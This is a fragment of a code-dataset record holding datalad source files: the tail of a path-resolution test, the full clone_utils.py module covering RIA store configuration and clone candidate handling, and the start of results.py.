ds=ds_global)),\n op.join(ds_global.path, os.pardir, 'bu'))\n\n # resolve against a dataset given as a path/str\n # (cmdline input scenario)\n eq_(resolve_path('bu', ds=ds_local.path), Path.cwd() / 'bu')\n eq_(resolve_path('bu', ds=ds_global.path), Path.cwd() / 'bu')\n # resolve against a dataset given as a dataset instance\n # (object method scenario)\n eq_(resolve_path('bu', ds=ds_local), ds_local.pathobj / 'bu')\n eq_(resolve_path('bu', ds=ds_global), ds_global.pathobj / 'bu')\n # not being inside a dataset doesn't change the resolution result\n eq_(resolve_path(op.join(os.curdir, 'bu'), ds=ds_global),\n ds_global.pathobj / 'bu')\n eq_(str(resolve_path(op.join(os.pardir, 'bu'), ds=ds_global)),\n op.join(ds_global.path, os.pardir, 'bu'))\n\n\n# little brother of the test above, but actually (must) run\n# under any circumstances\n@with_tempfile(mkdir=True)\ndef test_resolve_path_symlink_edition(path=None):\n deepest = ut.Path(path) / 'one' / 'two' / 'three'\n deepest_str = str(deepest)\n os.makedirs(deepest_str)\n with chpwd(deepest_str):\n # direct absolute\n eq_(deepest, resolve_path(deepest))\n eq_(deepest, resolve_path(deepest_str))\n # explicit direct relative\n eq_(deepest, resolve_path('.'))\n eq_(deepest, resolve_path(op.join('.', '.')))\n eq_(deepest, resolve_path(op.join('..', 'three')))\n eq_(deepest, resolve_path(op.join('..', '..', 'two', 'three')))\n eq_(deepest, resolve_path(op.join('..', '..', '..',\n 'one', 'two', 'three')))\n # weird ones\n eq_(deepest, resolve_path(op.join('..', '.', 'three')))\n eq_(deepest, resolve_path(op.join('..', 'three', '.')))\n eq_(deepest, resolve_path(op.join('..', 'three', '.')))\n eq_(deepest, resolve_path(op.join('.', '..', 'three')))\n\n\n@with_tempfile(mkdir=True)\ndef test_hashable(path=None):\n path = ut.Path(path)\n tryme = set()\n # is it considered hashable at all\n tryme.add(Dataset(path / 'one'))\n eq_(len(tryme), 1)\n # do another one, same class different path\n tryme.add(Dataset(path / 'two'))\n eq_(len(tryme), 2)\n # test whether two different types of repo instances pointing\n # to the same repo on disk are considered different\n Dataset(path).create()\n tryme.add(GitRepo(path))\n eq_(len(tryme), 3)\n tryme.add(AnnexRepo(path))\n eq_(len(tryme), 4)\n" }, { "alpha_fraction": 0.5777581334114075, "alphanum_fraction": 0.5797721147537231, "avg_line_length": 39.185142517089844, "blob_id": "c93ecd916136eb8fc5ab0dddb4a2667deb9a32fd", "content_id": "b0682822a88bef9cd6e7707bc64920efd8963456", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36247, "license_type": "permissive", "max_line_length": 87, "num_lines": 902, "path": "/datalad/core/distributed/clone_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Helpers used in the clone.py patch\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport re\nfrom os.path import expanduser\nfrom pathlib import Path\nfrom typing import (\n Dict,\n List,\n Tuple,\n)\nfrom urllib.parse import unquote as urlunquote\n\nfrom datalad.cmd import (\n CommandError,\n GitWitlessRunner,\n StdOutCapture,\n)\nfrom datalad.config import ConfigManager\nfrom datalad.distributed.ora_remote import (\n LocalIO,\n RIARemoteError,\n SSHRemoteIO,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.distribution.utils import _get_flexible_source_candidates\nfrom datalad.dochelpers import single_or_plural\nfrom datalad.log import log_progress\nfrom datalad.runner.exception import CommandError\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n CapturedException,\n DownloadError\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import (\n RI,\n SSHRI,\n URL,\n DataLadRI,\n download_url,\n get_local_file_url,\n is_url,\n)\nfrom datalad.support.strings import get_replacement_dict\nfrom datalad.utils import (\n Path,\n PurePosixPath,\n ensure_bool,\n ensure_list,\n make_tempfile,\n rmtree,\n)\n\n\n__docformat__ = 'restructuredtext'\n\nlgr = logging.getLogger('datalad.core.distributed.clone')\n\n\ndef postclone_preannex_cfg_ria(ds, remote=\"origin\"):\n\n # We need to annex-ignore the remote before annex-init is called on the clone,\n # due to issues 5186 and 5253 (and we would have done it afterwards anyway).\n # annex/objects in RIA stores is special for several reasons.\n # 1. the remote doesn't know about it (no actual local annex for the remote)\n # 2. RIA may use hashdir mixed, copying data to it via git-annex (if cloned\n # via ssh or local) would make it see a bare repo and establish a\n # hashdir lower annex object tree.\n # 3. We want the ORA remote to receive all data for the store, so its\n # objects could be moved into archives (the main point of a RIA store).\n\n # Note, that this function might need an enhancement as theoretically a RIA\n # store could also hold simple standard annexes w/o an intended ORA remote.\n # This needs the introduction of a new version label in RIA datasets, making\n # the following call conditional.\n ds.config.set(f'remote.{remote}.annex-ignore', 'true', scope='local')\n\n\ndef postclonecfg_ria(ds, props, remote=\"origin\"):\n \"\"\"Configure a dataset freshly cloned from a RIA store\"\"\"\n repo = ds.repo\n\n def get_uuid_from_store(store_url):\n # First figure whether we cloned via SSH, HTTP or local path and then\n # get that config file the same way:\n config_content = None\n scheme = store_url.split(':', 1)[0]\n if scheme in ['http', 'https']:\n try:\n config_content = download_url(\n \"{}{}config\".format(\n store_url,\n '/' if not store_url.endswith('/') else ''))\n except DownloadError as e:\n ce = CapturedException(e)\n lgr.debug(\"Failed to get config file from source:\\n%s\", ce)\n elif scheme == 'ssh':\n # TODO: switch the following to proper command abstraction:\n # SSHRemoteIO ignores the path part ATM. No remote CWD! (To be\n # changed with command abstractions). So we need to get that part to\n # have a valid path to the remote's config file:\n cfg_path = PurePosixPath(URL(store_url).path) / 'config'\n io = SSHRemoteIO(store_url)\n try:\n config_content = io.read_file(cfg_path)\n except RIARemoteError as e:\n ce = CapturedException(e)\n lgr.debug(\"Failed to get config file from source: %s\", ce)\n\n elif scheme == 'file':\n # TODO: switch the following to proper command abstraction:\n io = LocalIO()\n cfg_path = Path(URL(store_url).localpath) / 'config'\n try:\n config_content = io.read_file(cfg_path)\n except (RIARemoteError, OSError) as e:\n ce = CapturedException(e)\n lgr.debug(\"Failed to get config file from source: %s\", ce)\n else:\n lgr.debug(\"Unknown URL-Scheme %s in %s. Can handle SSH, HTTP or \"\n \"FILE scheme URLs.\", scheme, props['source'])\n\n # And read it\n uuid = None\n if config_content:\n runner = GitWitlessRunner()\n try:\n # \"git config -f -\" can read from stdin; this spares us a\n # temp file\n result = runner.run(\n ['git', 'config', '-f', '-', 'datalad.ora-remote.uuid'],\n stdin=config_content.encode(encoding='utf-8'),\n protocol=StdOutCapture\n )\n uuid = result['stdout'].strip()\n except CommandError as e:\n ce = CapturedException(e)\n # doesn't contain what we are looking for\n lgr.debug(\"Found no UUID for ORA special remote at \"\n \"'%s' (%s)\", remote, ce)\n\n return uuid\n\n\n\n\n # chances are that if this dataset came from a RIA store, its subdatasets\n # may live there too. Place a subdataset source candidate config that makes\n # get probe this RIA store when obtaining subdatasets\n ria_store_url = props['source'].split('#', maxsplit=1)[0]\n ds.config.set(\n # we use the label 'origin' for this candidate in order to not have to\n # generate a complicated name from the actual source specification.\n # we pick a cost of 200 to sort it before datalad's default candidates\n # for non-RIA URLs, because they prioritize hierarchical layouts that\n # cannot be found in a RIA store\n 'datalad.get.subdataset-source-candidate-200origin',\n # use the entire original URL, up to the fragment + plus dataset ID\n # placeholder, this should make things work with any store setup we\n # support (paths, ports, ...)\n ria_store_url + '#{id}',\n scope='local')\n\n # setup publication dependency, if a corresponding special remote exists\n # and was enabled (there could be RIA stores that actually only have repos)\n # make this function be a generator\n ora_remotes = [s for s in ds.siblings('query', result_renderer='disabled')\n if s.get('annex-externaltype') == 'ora']\n # get full special remotes' config for access to stored URL\n srs = repo.get_special_remotes() \\\n if hasattr(repo, 'get_special_remotes') else dict()\n\n has_only_disabled_ora = \\\n not ora_remotes and \\\n any(r.get('externaltype') == 'ora' for r in srs.values())\n\n def match_in_urls(special_remote_cfg, url_to_match):\n # Figure whether either `url` or `push-url` in an ORA remote's config\n # match a given URL (to a RIA store).\n return special_remote_cfg['url'].startswith(url_to_match) or \\\n (special_remote_cfg['push-url'].startswith(url_to_match)\n if 'push-url' in special_remote_cfg else False)\n\n no_enabled_ora_matches_url = \\\n all(not match_in_urls(srs[r['annex-uuid']], ria_store_url)\n for r in ora_remotes)\n\n if has_only_disabled_ora or no_enabled_ora_matches_url:\n\n # No ORA remote autoenabled, but configuration known about at least one,\n # or enabled ORA remotes seem to not match clone URL.\n # Let's check the remote's config for datalad.ora-remote.uuid as stored\n # by create-sibling-ria and try enabling that one.\n lgr.debug(\"Found no autoenabled ORA special remote. Trying to look it \"\n \"up in source config ...\")\n\n org_uuid = get_uuid_from_store(props['giturl'])\n\n # Now, enable it. If annex-init didn't fail to enable it as stored, we\n # wouldn't end up here, so enable with store URL as suggested by the URL\n # we cloned from.\n if org_uuid:\n if org_uuid in srs.keys():\n # TODO: - Double-check autoenable value and only do this when\n # true?\n # - What if still fails? -> Annex shouldn't change config\n # in that case\n\n # we only need the store:\n new_url = props['source'].split('#')[0]\n try:\n # local config to overwrite committed URL\n repo.config.set(\n f\"remote.{srs[org_uuid]['name']}.ora-url\",\n new_url, scope='local')\n repo.enable_remote(srs[org_uuid]['name'])\n lgr.info(\"Reconfigured %s for %s\",\n srs[org_uuid]['name'], new_url)\n # update ora_remotes for considering publication dependency\n # below\n ora_remotes = [s for s in\n ds.siblings('query',\n result_renderer='disabled')\n if s.get('annex-externaltype', None) ==\n 'ora']\n except CommandError as e:\n ce = CapturedException(e)\n lgr.debug(\"Failed to reconfigure ORA special remote: %s\", ce)\n repo.config.unset(f\"remote.{srs[org_uuid]['name']}.ora-url\",\n scope='local')\n else:\n lgr.debug(\"Unknown ORA special remote uuid at '%s': %s\",\n remote, org_uuid)\n\n # Set publication dependency for `remote` on the respective ORA remote:\n if ora_remotes:\n url_matching_remotes = [r for r in ora_remotes\n if srs[r['annex-uuid']]['url'] == ria_store_url]\n\n if len(url_matching_remotes) == 1:\n # We have exactly one ORA remote with the same store URL we used for\n # cloning (includes previously reconfigured remote).\n # Set publication dependency:\n yield from ds.siblings('configure',\n name=remote,\n publish_depends=url_matching_remotes[0]['name'],\n result_filter=None,\n result_renderer='disabled')\n\n elif not url_matching_remotes:\n # No matches but we have successfully autoenabled ORA remotes. Could\n # be the same store accessed by different method (cloning via HTTP\n # but special remote access via SSH). We can confidently set\n # publication dependency if the store knows the UUID.\n org_uuid = get_uuid_from_store(props['giturl'])\n uuid_matching_remotes = [r for r in ora_remotes\n if r['annex-uuid'] == org_uuid]\n if uuid_matching_remotes:\n # Multiple uuid matches are actually possible via same-as.\n # However, in that case we can't decide which one is supposed to\n # be used with publishing to `remote`.\n if len(uuid_matching_remotes) == 1:\n yield from ds.siblings(\n 'configure',\n name=remote,\n publish_depends=uuid_matching_remotes[0]['name'],\n result_filter=None,\n result_renderer='disabled')\n else:\n lgr.warning(\n \"Found multiple matching ORA remotes. Couldn't decide \"\n \"which one publishing to '%s' should depend on: %s.\"\n \" Consider running 'datalad siblings configure -s \"\n \"%s --publish-depends ORAREMOTENAME' to set \"\n \"publication dependency manually.\",\n remote,\n [r['name'] for r in uuid_matching_remotes],\n remote)\n\n else:\n # We have multiple ORA remotes with the same store URL we cloned\n # from.\n lgr.warning(\"Found multiple matching ORA remotes. Couldn't decide \"\n \"which one publishing to '%s' should depend on: %s.\"\n \" Consider running 'datalad siblings configure -s \"\n \"%s --publish-depends ORAREMOTENAME' to set \"\n \"publication dependency manually.\",\n remote,\n [r['name'] for r in url_matching_remotes],\n remote)\n\n\ndef _get_url_mappings(cfg):\n cfg_prefix = 'datalad.clone.url-substitute.'\n # figure out which keys we should be looking for\n # in the active config\n subst_keys = set(k for k in cfg.keys() if k.startswith(cfg_prefix))\n # and in the common config specs\n from datalad.interface.common_cfg import definitions\n subst_keys.update(k for k in definitions if k.startswith(cfg_prefix))\n # TODO a potential sorting of substitution series could be implemented\n # here\n return [\n # decode the rule specifications\n get_replacement_dict(\n # one or more could come out\n ensure_list(\n cfg.get(\n k,\n # make sure to pull the default from the common config\n default=cfg.obtain(k),\n # we specifically support declaration of multiple\n # settings to build replacement chains\n get_all=True)))\n for k in subst_keys\n ]\n\n\ndef _get_installationpath_from_url(url):\n \"\"\"Returns a relative path derived from the trailing end of a URL\n\n This can be used to determine an installation path of a Dataset\n from a URL, analog to what `git clone` does.\n \"\"\"\n ri = RI(url)\n if isinstance(ri, (URL, DataLadRI, SSHRI)): # decode only if URL\n path = ri.path.rstrip('/')\n path = urlunquote(path) if path else ri.hostname\n if '/' in path:\n path = path.split('/')\n if path[-1] == '.git':\n path = path[-2]\n else:\n path = path[-1]\n else:\n path = Path(url).parts[-1]\n if path.endswith('.git'):\n path = path[:-4]\n return path\n\n\ndef decode_source_spec(spec, cfg=None):\n \"\"\"Decode information from a clone source specification\n\n Parameters\n ----------\n spec : str\n Any supported clone source specification\n cfg : ConfigManager, optional\n Configuration will be queried from the instance (i.e. from a particular\n dataset). If None is given, the global DataLad configuration will be\n queried.\n\n Returns\n -------\n dict\n The value of each decoded property is stored under its own key in this\n dict. By default the following keys are return: 'type', a specification\n type label {'giturl', 'dataladri', 'ria'}; 'source' the original\n source specification; 'giturl' a URL for the source that is a suitable\n source argument for git-clone; 'version' a version-identifer, if present\n (None else); 'default_destpath' a relative path that that can be used as\n a clone destination.\n \"\"\"\n if cfg is None:\n from datalad import cfg\n # standard property dict composition\n props = dict(\n source=spec,\n version=None,\n )\n\n # Git never gets to see these URLs, so let's manually apply any\n # rewrite configuration Git might know about.\n # Note: We need to rewrite before parsing, otherwise parsing might go wrong.\n # This is particularly true for insteadOf labels replacing even the URL\n # scheme.\n spec = cfg.rewrite_url(spec)\n # common starting point is a RI instance, support for accepting an RI\n # instance is kept for backward-compatibility reasons.\n # this conversion will raise ValueError for any unrecognized RI\n source_ri = RI(spec) if not isinstance(spec, RI) else spec\n\n # scenario switch, each case must set 'giturl' at the very minimum\n if isinstance(source_ri, DataLadRI):\n # we have got our DataLadRI as the source, so expand it\n props['type'] = 'dataladri'\n props['giturl'] = source_ri.as_git_url()\n elif isinstance(source_ri, URL) and source_ri.scheme.startswith('ria+'):\n # parse a RIA URI\n dsid, version = source_ri.fragment.split('@', maxsplit=1) \\\n if '@' in source_ri.fragment else (source_ri.fragment, None)\n uuid_regex = r'[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}'\n if re.match(uuid_regex, dsid):\n trace = '{}/{}'.format(dsid[:3], dsid[3:])\n default_destpath = dsid\n elif dsid.startswith('~'):\n trace = 'alias/{}'.format(dsid[1:])\n default_destpath = dsid[1:]\n else:\n raise ValueError(\n 'RIA URI not recognized, no valid dataset ID or other supported '\n 'scheme: {}'.format(spec))\n # now we cancel the fragment in the original URL, but keep everything else\n # in order to be able to support the various combinations of ports, paths,\n # and everything else\n source_ri.fragment = ''\n # strip the custom protocol and go with standard one\n source_ri.scheme = source_ri.scheme[4:]\n # take any existing path, and add trace to dataset within the store\n source_ri.path = '{urlpath}{urldelim}{trace}'.format(\n urlpath=source_ri.path if source_ri.path else '',\n urldelim='' if not source_ri.path or source_ri.path.endswith('/') else '/',\n trace=trace,\n )\n props.update(\n type='ria',\n giturl=str(source_ri),\n version=version,\n default_destpath=default_destpath,\n )\n else:\n # let's assume that anything else is a URI that Git can handle\n props['type'] = 'giturl'\n # use original input verbatim\n props['giturl'] = spec\n\n if 'default_destpath' not in props:\n # if we still have no good idea on where a dataset could be cloned to if no\n # path was given, do something similar to git clone and derive the path from\n # the source\n props['default_destpath'] = _get_installationpath_from_url(props['giturl'])\n\n return props\n\n\ndef _map_urls(cfg, urls):\n mapping_specs = _get_url_mappings(cfg)\n if not mapping_specs:\n return urls\n\n mapped = []\n # we process the candidate in order to maintain any prioritization\n # encoded in it (e.g. _get_flexible_source_candidates_for_submodule)\n # if we have a matching mapping replace the URL in its position\n for u in urls:\n # we only permit a single match\n # TODO we likely want to RF this to pick the longest match\n mapping_applied = False\n # try one mapping set at a time\n for mapping_spec in mapping_specs:\n # process all substitution patterns in the specification\n # always operate on strings (could be a Path instance too)\n mu = str(u)\n matched = False\n for match_ex, subst_ex in mapping_spec.items():\n if not matched:\n matched = re.match(match_ex, mu) is not None\n if not matched:\n break\n # try to map, would return unchanged, if there is no match\n mu = re.sub(match_ex, subst_ex, mu)\n if mu != u:\n lgr.debug(\"URL substitution: '%s' -> '%s'\", u, mu)\n mapped.append(mu)\n # we could consider breaking after the for effective mapping\n # specification. however, that would mean any generic\n # definition of a broadly matching substitution would derail\n # the entroe system. moreover, suddently order would matter\n # substantially\n mapping_applied = True\n if not mapping_applied:\n # none of the mappings matches, go with the original URL\n # (really original, not the stringified one)\n mapped.append(u)\n return mapped\n\n\ndef _get_tracking_source(ds):\n \"\"\"Returns name and url of a potential configured source\n tracking remote\"\"\"\n vcs = ds.repo\n # if we have a remote, let's check the location of that remote\n # for the presence of the desired submodule\n\n remote_name, tracking_branch = vcs.get_tracking_branch()\n if not remote_name and isinstance(vcs, AnnexRepo):\n # maybe cloned from a source repo that was in adjusted mode\n # https://github.com/datalad/datalad/issues/3969\n remote_name, tracking_branch = vcs.get_tracking_branch(\n corresponding=False)\n # TODO: better default `None`? Check where we might rely on '':\n remote_url = ''\n if remote_name:\n remote_url = vcs.get_remote_url(remote_name, push=False)\n\n return remote_name, remote_url\n\n\ndef _generate_candidate_clone_sources(\n destds: Dataset,\n srcs: List,\n cfg: ConfigManager or None) -> List:\n \"\"\"Convert \"raw\" clone source specs to candidate URLs\n\n Returns\n -------\n Each item in the list is a dictionary with clone candidate properties.\n At minimum each dictionary contains a 'giturl' property, with a URL\n value suitable for passing to `git-clone`. Other properties are\n provided by `decode_source_spec()` and are documented there.\n \"\"\"\n # check for configured URL mappings, either in the given config manager\n # or in the one of the destination dataset, which is typically not existent\n # yet and the process config is then used effectively\n srcs = _map_urls(cfg or destds.config, srcs)\n\n # decode all source candidate specifications\n # use a given config or pass None to make it use the process config\n # manager. Theoretically, we could also do\n # `cfg or destds.config` as done above, but some tests patch\n # the process config manager\n candidate_sources = [decode_source_spec(s, cfg=cfg) for s in srcs]\n\n # now expand the candidate sources with additional variants of the decoded\n # giturl, while duplicating the other properties in the additional records\n # for simplicity. The hope is to overcome a few corner cases and be more\n # robust than git clone\n return [\n dict(props, giturl=s) for props in candidate_sources\n for s in _get_flexible_source_candidates(props['giturl'])\n ]\n\n\ndef _test_existing_clone_target(\n destds: Dataset,\n candidate_sources: List) -> Tuple:\n \"\"\"Check if the clone target exists, inspect it, if so\n\n Returns\n -------\n (bool, dict or None)\n A flag whether the target exists, and either a dict with properties\n of a result that should be yielded before an immediate return, or\n None, if the processing can continue\n \"\"\"\n # important test! based on this `rmtree` will happen below after\n # failed clone\n dest_path = destds.pathobj\n dest_path_existed = dest_path.exists()\n if dest_path_existed and any(dest_path.iterdir()):\n if destds.is_installed():\n # check if dest was cloned from the given source before\n # this is where we would have installed this from\n # this is where it was actually installed from\n track_name, track_url = _get_tracking_source(destds)\n try:\n # this will get us track_url in system native path conventions,\n # whenever it is a path (and not a URL)\n # this is needed to match it to any potentially incoming local\n # source path in the 'notneeded' test below\n track_path = str(Path(track_url))\n except Exception as e:\n CapturedException(e)\n # this should never happen, because Path() will let any non-path\n # stringification pass through unmodified, but we do not want any\n # potential crash due to pathlib behavior changes\n lgr.debug(\"Unexpected behavior of pathlib!\")\n track_path = None\n for cand in candidate_sources:\n src = cand['giturl']\n if track_url == src \\\n or (not is_url(track_url)\n and get_local_file_url(\n track_url, compatibility='git') == src) \\\n or track_path == expanduser(src):\n return dest_path_existed, dict(\n status='notneeded',\n message=(\"dataset %s was already cloned from '%s'\",\n destds,\n src),\n )\n # anything else is an error\n return dest_path_existed, dict(\n status='error',\n message='target path already exists and not empty, '\n 'refuse to clone into target path',\n )\n # found no reason to stop, i.e. empty target dir\n return dest_path_existed, None\n\n\ndef _try_clone_candidates(\n *,\n destds: Dataset,\n candidate_sources: List,\n clone_opts: List,\n dest_path_existed: bool) -> Tuple:\n \"\"\"Iterate over candidate URLs and attempt a clone\n\n Parameters\n ----------\n destds: Dataset\n The target dataset the clone should materialize at.\n candidate_sources: list\n Each value is a dict with properties, as returned by\n `_generate_candidate_clone_sources()`\n clone_opts: list\n Options to be passed on to `_try_clone_candidate()`\n dest_path_existed: bool\n Flag whether the target path existed before attempting a clone.\n\n Returns\n -------\n (dict or None, dict, dict or None)\n The candidate record of the last clone attempt,\n a mapping of candidate URLs to potential error messages they yielded,\n and either a dict with properties of a result that should be yielded\n before an immediate return, or None, if the processing can continue\n \"\"\"\n log_progress(\n lgr.info,\n 'cloneds',\n 'Attempting a clone into %s', destds.path,\n unit=' candidates',\n label='Cloning',\n total=len(candidate_sources),\n )\n error_msgs = dict() # accumulate all error messages formatted per each url\n for cand in candidate_sources:\n log_progress(\n lgr.info,\n 'cloneds',\n 'Attempting to clone from %s to %s', cand['giturl'], destds.path,\n update=1,\n increment=True)\n\n tried_url, error, fatal = _try_clone_candidate(\n destds=destds,\n cand=cand,\n clone_opts=clone_opts,\n )\n\n if error is not None:\n lgr.debug(\"Failed to clone from URL: %s (%s)\",\n tried_url, error)\n\n error_msgs[tried_url] = error\n\n # ready playing field for the next attempt\n if destds.pathobj.exists():\n lgr.debug(\"Wiping out unsuccessful clone attempt at: %s\",\n destds.path)\n # We must not just rmtree since it might be curdir etc\n # we should remove all files/directories under it\n # TODO stringification can be removed once patlib compatible\n # or if PY35 is no longer supported\n rmtree(destds.path, children_only=dest_path_existed)\n\n if fatal:\n # cancel progress bar\n log_progress(\n lgr.info,\n 'cloneds',\n 'Completed clone attempts for %s', destds\n )\n return cand, error_msgs, fatal\n\n if error is None:\n # do not bother with other sources if succeeded\n break\n\n log_progress(\n lgr.info,\n 'cloneds',\n 'Completed clone attempts for %s', destds\n )\n return cand, error_msgs, None\n\n\ndef _try_clone_candidate(\n *,\n destds: Dataset,\n cand: Dict,\n clone_opts: List) -> Tuple:\n \"\"\"Attempt a clone from a single candidate\n\n destds: Dataset\n The target dataset the clone should materialize at.\n candidate_sources: list\n Each value is a dict with properties, as returned by\n `_generate_candidate_clone_sources()`\n clone_opts: list\n Options to be passed on to `_try_clone_candidate()`\n\n Returns\n -------\n (str, str or None, dict or None)\n The first item is the effective URL a clone was attempted from.\n The second item is `None` if the clone was successful, or an\n error message, detailing the failure for the specific URL.\n If the third item is not `None`, it must be a result dict that\n should be yielded, and no further clone attempt (even when\n other candidates remain) will be attempted.\n \"\"\"\n # right now, we only know git-clone based approaches\n return _try_git_clone_candidate(\n destds=destds,\n cand=cand,\n clone_opts=clone_opts,\n )\n\n\ndef _try_git_clone_candidate(\n *,\n destds: Dataset,\n cand: Dict,\n clone_opts: List) -> Tuple:\n \"\"\"_try_clone_candidate() using `git-clone`\n\n Parameters and return value behavior is as described in\n `_try_clone_candidate()`.\n \"\"\"\n if cand.get('version', None):\n opts = clone_opts + [\"--branch=\" + cand['version']]\n else:\n opts = clone_opts\n\n try:\n GitRepo.clone(\n path=destds.path,\n url=cand['giturl'],\n clone_options=opts,\n create=True)\n\n except CommandError as e:\n ce = CapturedException(e)\n e_stderr = e.stderr\n\n # MIH thinks this should rather use any of ce's message generating\n # methods, but kept it to avoid behavior changes\n error_msg = e\n\n if e_stderr and 'could not create work tree' in e_stderr.lower():\n # this cannot be fixed by trying another URL\n re_match = re.match(r\".*fatal: (.*)$\", e_stderr,\n flags=re.MULTILINE | re.DOTALL)\n # existential failure\n return cand['giturl'], error_msg, dict(\n status='error',\n message=re_match.group(1).strip()\n if re_match else \"stderr: \" + e_stderr,\n )\n\n # failure for this URL\n return cand['giturl'], error_msg, None\n\n # success\n return cand['giturl'], None, None\n\n\ndef _format_clone_errors(\n destds: Dataset,\n error_msgs: List,\n last_clone_url: str) -> Tuple:\n \"\"\"Format all accumulated clone errors across candidates into one message\n\n Returns\n -------\n (str, list)\n Message body and string formatting arguments for it.\n \"\"\"\n if len(error_msgs):\n if all(not e.stdout and not e.stderr for e in error_msgs.values()):\n # there is nothing we can learn from the actual exception,\n # the exit code is uninformative, the command is predictable\n error_msg = \"Failed to clone from all attempted sources: %s\"\n error_args = list(error_msgs.keys())\n else:\n error_msg = \"Failed to clone from any candidate source URL. \" \\\n \"Encountered errors per each url were:\\n- %s\"\n error_args = '\\n- '.join(\n '{}\\n {}'.format(url, exc.to_str())\n for url, exc in error_msgs.items()\n )\n else:\n # yoh: Not sure if we ever get here but I felt that there could\n # be a case when this might happen and original error would\n # not be sufficient to troubleshoot what is going on.\n error_msg = \"Awkward error -- we failed to clone properly. \" \\\n \"Although no errors were encountered, target \" \\\n \"dataset at %s seems to be not fully installed. \" \\\n \"The 'succesful' source was: %s\"\n error_args = (destds.path, last_clone_url)\n return error_msg, error_args\n\n\ndef _get_remote(repo: GitRepo) -> str:\n \"\"\"Return the name of the remote of a freshly clones repo\n\n Raises\n ------\n RuntimeError\n In case there is no remote, which should never happen.\n \"\"\"\n remotes = repo.get_remotes(with_urls_only=True)\n nremotes = len(remotes)\n if nremotes == 1:\n remote = remotes[0]\n lgr.debug(\"Determined %s to be remote of %s\", remote, repo)\n elif remotes > 1:\n lgr.warning(\n \"Fresh clone %s unexpected has multiple remotes: %s. Using %s\",\n repo.path, remotes, remotes[0])\n remote = remotes[0]\n else:\n raise RuntimeError(\"bug: fresh clone has zero remotes\")\n return remote\n\n\ndef _check_autoenable_special_remotes(repo: AnnexRepo):\n \"\"\"Check and report on misconfigured/dysfunctional special remotes\n \"\"\"\n srs = {True: [], False: []} # special remotes by \"autoenable\" key\n remote_uuids = None # might be necessary to discover known UUIDs\n\n repo_config = repo.config\n for uuid, config in repo.get_special_remotes().items():\n sr_name = config.get('name', None)\n if sr_name is None:\n lgr.warning(\n 'Ignoring special remote %s because it does not have a name. '\n 'Known information: %s',\n uuid, config)\n continue\n sr_autoenable = config.get('autoenable', False)\n try:\n sr_autoenable = ensure_bool(sr_autoenable)\n except ValueError as e:\n CapturedException(e)\n lgr.warning(\n 'Failed to process \"autoenable\" value %r for sibling %s in '\n 'dataset %s as bool. '\n 'You might need to enable it later manually and/or fix it up '\n 'to avoid this message in the future.',\n sr_autoenable, sr_name, repo.path)\n continue\n\n # If it looks like a type=git special remote, make sure we have up to\n # date information. See gh-2897.\n if sr_autoenable and repo_config.get(\n \"remote.{}.fetch\".format(sr_name)):\n try:\n repo.fetch(remote=sr_name)\n except CommandError as exc:\n ce = CapturedException(exc)\n lgr.warning(\"Failed to fetch type=git special remote %s: %s\",\n sr_name, ce)\n\n # determine whether there is a registered remote with matching UUID\n if uuid:\n if remote_uuids is None:\n remote_uuids = {\n # Check annex-config-uuid first. For sameas annex remotes,\n # this will point to the UUID for the configuration (i.e.\n # the key returned by get_special_remotes) rather than the\n # shared UUID.\n (repo_config.get('remote.%s.annex-config-uuid' % r) or\n repo_config.get('remote.%s.annex-uuid' % r))\n for r in repo.get_remotes()\n }\n if uuid not in remote_uuids:\n srs[sr_autoenable].append(sr_name)\n\n if srs[True]:\n lgr.debug(\n \"configuration for %s %s added because of autoenable,\"\n \" but no UUIDs for them yet known for dataset %s\",\n # since we are only at debug level, we could call things their\n # proper names\n single_or_plural(\"special remote\",\n \"special remotes\", len(srs[True]), True),\n \", \".join(srs[True]),\n repo.path\n )\n\n if srs[False]:\n # if has no auto-enable special remotes\n lgr.info(\n 'access to %s %s not auto-enabled, enable with:\\n'\n '\\t\\tdatalad siblings -d \"%s\" enable -s %s',\n # but since humans might read it, we better confuse them with our\n # own terms!\n single_or_plural(\"dataset sibling\",\n \"dataset siblings\", len(srs[False]), True),\n \", \".join(srs[False]),\n repo.path,\n srs[False][0] if len(srs[False]) == 1 else \"SIBLING\",\n )\n" }, { "alpha_fraction": 0.6163566708564758, "alphanum_fraction": 0.6174296736717224, "avg_line_length": 35.469566345214844, "blob_id": "4559b354f8d290b8b642c0aea9d18bf950b6b2cf", "content_id": "c5c5567e244e5e18571eabc20eaf13f4880aead5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16776, "license_type": "permissive", "max_line_length": 104, "num_lines": 460, "path": "/datalad/interface/results.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface result handling functions\n\n\"\"\"\n\nfrom __future__ import annotations\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nfrom collections.abc import (\n Iterable,\n Iterator,\n)\nfrom os.path import (\n isabs,\n isdir,\n)\nfrom os.path import join as opj\nfrom os.path import (\n normpath,\n relpath,\n)\nfrom typing import (\n Any,\n Optional,\n)\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.exceptions import (\n CapturedException,\n CommandError,\n format_oneline_tb,\n)\nfrom datalad.support.path import robust_abspath\nfrom datalad.utils import (\n PurePosixPath,\n ensure_list,\n path_is_subpath,\n)\n\nlgr = logging.getLogger('datalad.interface.results')\nlgr.log(5, \"Importing datalad.interface.results\")\n\n# which status is a success , which is failure\nsuccess_status_map = {\n 'ok': 'success',\n 'notneeded': 'success',\n 'impossible': 'failure',\n 'error': 'failure',\n}\n\n\ndef get_status_dict(\n action: Optional[str] = None,\n ds: Optional[Dataset] = None,\n path: 